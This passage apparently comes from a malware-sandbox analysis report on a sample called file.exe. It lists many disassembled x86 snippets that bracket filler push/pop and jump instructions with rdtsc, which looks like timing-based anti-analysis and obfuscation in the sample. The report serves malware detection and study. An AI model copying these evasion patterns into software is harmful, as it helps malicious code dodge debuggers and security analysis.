                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADC08A second address: ADC095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADC095 second address: ADC099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5AFFD second address: A5B005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B005 second address: A5B00C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA81FC second address: AA8201 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA8201 second address: A87F1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDF30F40A60h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d jmp 00007FDF30F40A60h 0x00000012 lea eax, dword ptr [ebp+12489FA0h] 0x00000018 mov cx, 6A1Ah 0x0000001c nop 0x0000001d jnc 00007FDF30F40A71h 0x00000023 push eax 0x00000024 jmp 00007FDF30F40A5Ch 0x00000029 nop 0x0000002a push 00000000h 0x0000002c push ecx 0x0000002d call 00007FDF30F40A58h 0x00000032 pop ecx 0x00000033 mov dword ptr [esp+04h], ecx 0x00000037 add dword ptr [esp+04h], 0000001Dh 0x0000003f inc ecx 0x00000040 push ecx 0x00000041 ret 0x00000042 pop ecx 0x00000043 ret 0x00000044 or ecx, dword ptr [ebp+122D2B86h] 0x0000004a call dword ptr [ebp+122D1BD2h] 0x00000050 push ecx 0x00000051 pushad 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA835F second address: AA8384 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDF30D0E309h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007FDF30D0E2F6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA8384 second address: AA839E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDF30F40A60h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA839E second address: AA83A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA83A4 second address: AA83A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA894D second address: AA8953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA903C second address: AA9040 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9377 second address: AA937B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA937B second address: AA93DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a movzx edx, si 0x0000000d jno 00007FDF30F40A5Ch 0x00000013 lea eax, dword ptr [ebp+12489FE4h] 0x00000019 sub dword ptr [ebp+12454379h], ebx 0x0000001f push eax 0x00000020 push edi 0x00000021 pushad 0x00000022 push edx 0x00000023 pop edx 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 pop edi 0x00000028 mov dword ptr [esp], eax 0x0000002b push 00000000h 0x0000002d push ebx 0x0000002e call 00007FDF30F40A58h 0x00000033 pop ebx 0x00000034 mov dword ptr [esp+04h], ebx 0x00000038 add dword ptr [esp+04h], 0000001Bh 0x00000040 inc ebx 0x00000041 push ebx 0x00000042 ret 0x00000043 pop ebx 0x00000044 ret 0x00000045 lea eax, dword ptr [ebp+12489FA0h] 0x0000004b movsx ecx, bx 0x0000004e push eax 0x0000004f push ebx 0x00000050 push eax 0x00000051 push edx 0x00000052 push edi 0x00000053 pop edi 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA93DE second address: AA93E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE0CDA second address: AE0D01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDF30F40A5Bh 0x00000009 popad 0x0000000a jnl 00007FDF30F40A5Eh 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 pop eax 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE0D01 second address: AE0D16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDF30D0E301h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE0D16 second address: AE0D1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE3FA6 second address: AE3FAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE3FAA second address: AE3FB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDF30F40A5Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE3FB9 second address: AE3FC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE3FC2 second address: AE3FEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jnp 00007FDF30F40A56h 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FDF30F40A62h 0x00000018 push eax 0x00000019 pop eax 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE3FEA second address: AE3FF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6328B second address: A6328F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE796B second address: AE79A7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 jbe 00007FDF30D0E30Ch 0x0000000c jmp 00007FDF30D0E304h 0x00000011 pushad 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 jmp 00007FDF30D0E304h 0x0000001b push ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE79A7 second address: AE79B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push esi 0x00000006 jns 00007FDF30F40A56h 0x0000000c pop esi 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE7ACA second address: AE7AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE7AD0 second address: AE7B0B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FDF30F40A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e jmp 00007FDF30F40A61h 0x00000013 popad 0x00000014 push esi 0x00000015 jmp 00007FDF30F40A64h 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE7C8A second address: AE7C90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE7C90 second address: AE7CB4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDF30F40A66h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE7CB4 second address: AE7CBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEA51A second address: AEA51E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEA048 second address: AEA053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEA053 second address: AEA092 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDF30F40A65h 0x00000007 jmp 00007FDF30F40A61h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007FDF30F40A5Dh 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push edi 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEA092 second address: AEA096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEA096 second address: AEA0B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDF30F40A67h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEA1F4 second address: AEA210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDF30D0E307h 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEA210 second address: AEA221 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDF30F40A5Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AED907 second address: AED90D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AED90D second address: AED913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AED913 second address: AED91D instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDF30D0E302h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEDC0A second address: AEDC10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEDC10 second address: AEDC14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEDC14 second address: AEDC19 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEDEED second address: AEDEF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEDEF1 second address: AEDF10 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDF30F40A56h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FDF30F40A60h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF224E second address: AF2264 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDF30D0E2FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF2264 second address: AF226B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF1608 second address: AF160C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF1736 second address: AF1740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF18B3 second address: AF18BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF18BB second address: AF18DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDF30F40A66h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF18DB second address: AF18F3 instructions: 0x00000000 rdtsc 0x00000002 je 00007FDF30D0E302h 0x00000008 jp 00007FDF30D0E2F6h 0x0000000e jnc 00007FDF30D0E2F6h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF1D06 second address: AF1D0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF1E52 second address: AF1E59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA8EF2 second address: AA8F14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov dword ptr [esp], eax 0x00000008 or dword ptr [ebp+122D22B6h], ecx 0x0000000e mov edi, dword ptr [ebp+122D2CBEh] 0x00000014 push 00000004h 0x00000016 mov ecx, dword ptr [ebp+122D1C08h] 0x0000001c push eax 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA8F14 second address: AA8F18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA8F18 second address: AA8F1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF7EDE second address: AF7EF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDF30D0E302h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF7EF4 second address: AF7F0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDF30F40A62h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF7F0C second address: AF7F10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF7F10 second address: AF7F32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDF30F40A65h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF7F32 second address: AF7F38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF8116 second address: AF811A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF811A second address: AF812B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FDF30D0E2FBh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFF3A3 second address: AFF3A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFF66D second address: AFF68E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 jmp 00007FDF30D0E2FBh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FDF30D0E2FCh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFFF7D second address: AFFF85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFFF85 second address: AFFF89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B00556 second address: B0056E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FDF30F40A56h 0x00000008 ja 00007FDF30F40A56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 je 00007FDF30F40A73h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B00B48 second address: B00B4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B00DA6 second address: B00DAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5CA60 second address: A5CA79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDF30D0E305h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0C7BB second address: B0C7C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 jl 00007FDF30F40A56h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0BA55 second address: B0BA59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0BA59 second address: B0BA6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0C4BB second address: B0C4C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0C4C5 second address: B0C4D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jng 00007FDF30F40A56h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B12A3F second address: B12A43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B12A43 second address: B12A47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B12E34 second address: B12E40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FDF30D0E302h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B12E40 second address: B12E46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1329E second address: B132A9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B13552 second address: B13590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a jns 00007FDF30F40A56h 0x00000010 popad 0x00000011 jmp 00007FDF30F40A61h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FDF30F40A69h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B13844 second address: B13854 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FDF30D0E2F6h 0x00000008 jns 00007FDF30D0E2F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B13854 second address: B13863 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 push edx 0x00000007 jl 00007FDF30F40A56h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B14633 second address: B1463F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FDF30D0E2F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B12569 second address: B125DE instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FDF30F40A56h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d jmp 00007FDF30F40A68h 0x00000012 jmp 00007FDF30F40A60h 0x00000017 pop edi 0x00000018 jmp 00007FDF30F40A5Dh 0x0000001d pushad 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 jmp 00007FDF30F40A61h 0x00000025 pushad 0x00000026 popad 0x00000027 push eax 0x00000028 pop eax 0x00000029 popad 0x0000002a popad 0x0000002b pushad 0x0000002c push edi 0x0000002d pushad 0x0000002e popad 0x0000002f jmp 00007FDF30F40A5Dh 0x00000034 pop edi 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B125DE second address: B125E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B125E2 second address: B125F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDF30F40A5Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B125F4 second address: B125FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1850A second address: B1850E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1850E second address: B18545 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDF30D0E306h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007FDF30D0E2F6h 0x00000011 jmp 00007FDF30D0E305h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B18545 second address: B18549 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
